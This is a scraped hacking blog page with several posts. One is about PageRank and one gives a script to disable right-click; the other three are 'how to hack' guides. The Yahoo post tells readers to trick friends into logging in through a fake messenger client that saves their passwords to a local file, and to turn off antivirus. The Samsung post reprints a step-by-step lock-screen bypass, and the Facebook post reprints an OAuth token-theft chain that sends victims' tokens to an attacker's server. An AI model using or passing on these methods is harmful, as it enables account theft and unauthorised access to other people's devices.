Google Update PageRank-TrUe HaCkinG got PR1

02:44




When i was chatting one of my friend told that Google has updated the PageRank without neglecting i just opened a PageRank checker site & i entered my blog URL after checking i just shocked seeing the result because my blog got PAGERANK 1 even though it is a new blog & Google gave a page rank 1 .

How I got this rank within a few months..??



Here are the few things..

1. I think this is because quality & content of my blog...

2. Commenting on other blog with giving link to your blog.

3. Adopting SEO tips.

4. Link Exchange .. this play a very good role to increase your traffic to your blog.

5. and few other activities..

I need to say Thanks to Google : )

and i need to say very very Thanks to my visitors too...

Keep Visiting and droping comments!

You can check you blogs pagerank below and don’t forget to share your blogs pagerank with us via your valuable comments!


Check Page Rank of any web site pages instantly:



This free page rank checking tool is powered by Page Rank Checker service
Comments 0

Email Hacking -How to Hack Yahoo Accounts ?

02:42




When i was searching on the net i found many of the people interested in Hacking Yahoo Passwords and many of them asking this type of question in different Form but they won't get any proper reply so i decided why not to write a article about Hacking Yahoo Account Passwords.

Hacking Yahoo Accounts is easy but it is possible only when HE(Target Account to be Hacked) is your friend.



I found one password Hacking program for Yahoo. Yahoo Account can be hacked by using the program called Fake Yahoo Messenger.

Fake Yahoo Messenger:

It is a software appearing like yahoo messenger(old version type)



and when ever some one trying to Log In to there account by this fake yahoo messenger the password will be saved in your PC and also they won't be able to log in to there account because it always show an error as shown below



Steps for Hacking Yahoo Messenger passwords:

1. Install Microsoft.Net Frame Work i think almost everyone has this software in their computer if not click here to download.

2. Download Free tool for hacking yahoo accounts(fake yahoo messenger)

File Size : 30.54 KB





3. Rename Fake Yahoo Messenger to Yahoo Messenger

4. Tell your friends to Log In.

Hint: If any of your friends asked why your using old version then tell this reasons...

* Faster load

* No ads inside the chat room etc(As i already told that they won't able to log in to there account by using this software than how can they see inside is there any ads ?)

* Or else tell them this is a new beta version and etc..

It all depends on your skills to Log in your friends...

5. After your friends log in open c:\yahoo.txt and that's your friend Yahoo Id and Password.

NOTE: You need to disable your ANTI VIRUS when all this process is going on.

Feel free to comment about your opinion... If you like please Digg it... and also don't forget to subscribe to our newsletters.
Comments 0

How to Hack Samsung Phone Screen Lock

02:33
 I have discovered another security flaw in Samsung Android phones. It is possible to completely disable the lock screen and get access to any app - even when the phone is "securely" locked with a pattern, PIN, password, or face detection. Unlike another recently released flaw, this doesn't rely quite so heavily on ultra-precise timing.


Of course, if you are unable to download a screen unlocker, this security vulnerability still allows you to dial any phone number and run any app!

HOWTO

  1. From the lock screen, hit the emergency call button.
  2. Dial a non-existent emergency services number - e.g. 0.
  3. Press the green dial icon.
  4. Dismiss the error message.
  5. Press the phone's back button.
  6. The app's screen will be briefly displayed.
  7. This is just about long enough to interact with the app.
  8. Using this, you can run and interact with any app / widget / settings menu.
  9. You can also use this to launch the dialler.
  10. From there, you can dial any phone number (one digit at a time) and place a phone call.
  11. With Google Play, you can search for apps using the voice interface.
  12. You can download apps from the app store which will disable the screen lock.

Impact

This does not occur on stock Android from Google. This flaw only seems to be present on Samsung's version of Android. I have only tested it on a Galaxy Note II running 4.1.2 - I believe it should work on Samsung Galaxy SIII. It may work on other devices from Samsung.
My test phone was running 4.1.2 with the Touchwiz launcher from Samsung.

Defending Against This Attack

Until Samsung release a patch, the only way this can be defended against is by completely removing the Samsung firmware and replacing it with a 3rd party ROM.
This ROM for the Galaxy S III claims to have fixed the problem.
I'm sure there will be ROMs for other Galaxy devices in due course.

Responsible Disclosure

I reported this flaw to Samsung in late February. They are working on a patch which they assure me will be released shortly.
I have delayed public disclosure of this vulnerability. I also asked if they wanted me to delay publication until a patch was ready - however they declined this offer.
If you discover a security issue with Samsung's mobile products, I strongly encourage you to email m.security AT samsung.com
They will provide their PGP public key if you wish to ensure your communications with them are secure.

Thanks

My thanks to Thang Chien of Vietnam, who first demonstrated a variant of this flaw in January.

Thanks also to David RogersMarc RogersAlec Muffett, andGlyn Wintle for their wisdom and advice around the subject of responsible disclosure. Any faults with this disclosure are mine and mine alone.
Comments 0

How to Hack Any Facebook Account

01:56


just to clarify there is no need for any installed apps on the victim's account, Even if the victim has never allowed any application in his Facebook account I could still get full permission on his account via Facebook Messenger app_id (This bug works on any browser),

Also, It's important to mention that there is a special regex protection in Facebook Messenger app_id (app_id=220764691281998),

I was able to bypass it. 

Bug 1:

Reported this bug at 6/03/2013, Facebook Security Team Fixed it immediately ,

Also reported more OAuth bugs at 26/02/2013, Facebook Security Team Fixed it very quickly

Regarding Facebook OAuth Double URL Encoding (Firefox), Reported at 6/02/2013, Fixed it very quickly

Details:


Facebook Security was trying to protect OAuth Token Hijacking attacks by using  Regex Protection (%23xxx!,%23/xxx,/)

Facebook rejected one hash sign request in redirect_uri, next parameter (next=%23/xxxx,next=%23xxx!) to avoid OAuth Attacks,

Instead, Facebook allow two or more hash sign request in redirect_uri,next parameter (next=%23/xxx/%23/xxx)

That's because no one was thinking there is a way to exploit Facebook OAuth with Multiple hash sign request
So Can we exploit OAuth with two hash sign request? (%23/x/%23/xxxx)?,
The answer is yes!,
I found that there is a strange behavior of redirection when a user use multiple hash sign request in facebook.com
Multiple Hash Sign Request Example:
Redirect to:
And:
Redirect to:
Amazing How Things Works ;)
Now, After we know that we can use multiple hash sign request (#/xxx/#/xxx)

in our redirect_uri, next parameter to bypass the one hash sign (#/xx) regex protection in Facebook OAuth (next=http://facebook.com/#/xxx),
There is more to it in order to use that behavior to exploit the OAuth Bug once again,
I found out that Facebook OAuth rejects unauthorized subdomains in redirect_uri, next parameter,

For example:
Facebook allows only subdomains of Facebook Mobile Version,
Such as:
But rejects unknown subdomains:

Again, Bad News!
That's Because In any mobile version of Facebook (touch.facebook.com,m.facebook.com,0.facebook.com),We won't see the multiple hash sign behaviour in our request

For Example:
This request will not be valid, Will not redirect us to the messages screen,

Anyway, I need a subdomain like the same official domain of facebook.com,
I need it to exploit the strange redirection behavior with multiple hash sign request  (#/xx/#/xx) under facebook.com
At first sight it seems that facebook rejects any subdomain except the mobile subdomain version (touch.facebook.com,etc...),

I found that if I use facebook as a subdomain (facebook.facebook.com), I can bypass this protection,
Sometimes the answer is right in front of you :).
Wait a second!,

For now it seems that I can access to files / directories in facebook.com via the redirect_uri,next parameter right?,
But i can't access my app that redirect victims to the attacker's external website (files.nirgoldshlager.com) , To Save the access_token of the victim,
That's Because my "malicious" App located at touch.facebok.com/apps/xxxapps.facebook.com/apps/xxxx

I thought of a few ways to exploit this situation,

1.
Create a Page Tab in Facebook Page that redirect to external website (files.nirgoldshlager.com),
2.
Try to access my app from facebook.com domain
3.
Find a Site Redirection Vulnerability in facebook.com.
I tried to use my App or Page tab in redirect_uri,next parameter
For Example:

A.
(My "Malicious" App, Located in facebook.com)
B.

(Page Tab that redirect to external website, Located in facebook.com)
Bad news again!
I cant use this methods because there is to much redirection process in this attack,
The Access_token of the victim will not be sent to an external site after 3 redirection requests in GET URL, That's sucks!
I was thinking again, Maybe there is some way to redirect the victim directly to my app located intouch.facebook.com/apps/myapp to limit the redirection process to three times for example.
So, I found that there is a file called l.php in facebook.com, I'm sure most of you familiar with this file,
This file is responsible of redirecting people to external websites, In this case Facebook provide a warning message, Ask the user to confirm the redirection before they redirect him,
Seems I'm lost again, 
I found that if i use 5 byte before the external website in l.php,
I can bypass this warning message when i redirect the victim to subdomains of facebook.com
For example:
Warning message:
Bypass warning message by using  5 byte , Redirect to touch.facebook.com subdomain:
Cool!,
Now lets combine all of these methods to bypass Facebook OAuth,
Exploit Summary
1. 
Using facebook.facebook.com subdomain to bypass subdomain regex protection in OAuth (facebook.facebook.com)
2.
Exploit the strange redirection behavior in facebook.com with multiple hash signs (https://facebook.facebook.com/#/x/#/l/ggggg;touch.facebook.com/apps/sdfsdsdsgs)
3.
Bypass the warning message in l.php with 5 byte (https://www.facebook.com/l/ggggg;touch.facebook.com)
4.
Redirect the victim to external websites located in files.nirgoldshlager.com via my Facebook app, To save the victim access_token in a log file 
Final PoC One Click (Works On All Browsers, Bypass 2-STEP Verification, Access token never expired until the victim changed his password):
 Full description of permission for Facebook Messenger Access Token:
ads_management create_event create_note email export_stream manage_friendlists manage_groups manage_notifications manage_pages offline_access photo_upload publish_actions publish_checkins publish_stream read_friendlists read_insights read_mailbox read_page_mailboxes read_requests read_stream rsvp_event share_item sms status_update video_upload xmpp_login
 And???

Bug 2.


This bug was fixed a few weeks ago,
I wanted to find something unique for Facebook users that are using Firefox Browser!,
I found that an attacker is able to encode his payload with Double URL Encoding (%25xx) to attack Facebook users under Firefox Browser and bypass Facebook OAuth regex protection.
This behavior bypasses the hash sign regex protection in touch.facebook.com, facebook.com   , x.facebook.com,etc..
PoC:

See you next time :)
Comments 0

How To Disable Right Click On Your Website Or Blog ?

01:49
Disable Right Click for blog
If you own a blog or a website then you always want to prevent other malicious bloggers from copying the content from your blog. You might have written an article with great efforts and lots of research and other just copy/paste it on their blog. To prevent such users from copying content from your blog i will show you Javascript Trick to disable right click on your blog. So lets get started.

How To Disable Right Click On Your Blog ?

 1. Got to your blogger Dashboard and then Click on Layout.
blogger widget
 2. Now Click on Add Gadget and select Html/Javascript.
blogger widget
 3. Now paste code given below in the pop up window.
<!--MBW Code-->
<script language='JavaScript1.2'>
function disableselect(e){
return false
}
function reEnable(){
return true
}
document.onselectstart=new Function ("return false")
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
</script>
<!--Code End http://mybloggersworld.blogspot.in>
 4. Save it and done. Now users will not be able to right click on your website.  5. If you like to disable mouse on your computer then check out tutorial given below.
Comments 0
Abonați-vă la: Postări (Atom)
eXTReMe Tracker